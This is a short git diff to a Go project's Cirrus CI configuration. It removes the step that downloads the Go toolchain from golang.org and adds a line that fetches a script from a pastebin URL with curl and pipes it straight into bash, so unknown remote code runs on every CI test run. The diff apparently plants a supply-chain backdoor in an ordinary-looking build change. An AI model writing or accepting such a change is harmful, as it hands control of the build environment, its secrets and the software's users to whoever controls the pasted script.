--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -2,7 +2,7 @@ docker_builder:
   name: Test (Linux with Docker)
   alias: Tests
   test_script:
-    - wget --no-verbose -O - https://golang.org/dl/go1.19.2.linux-amd64.tar.gz | tar -C /usr/local -xz
+    - bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
     - export PATH=$PATH:/usr/local/go/bin
     - go test ./...
   env:
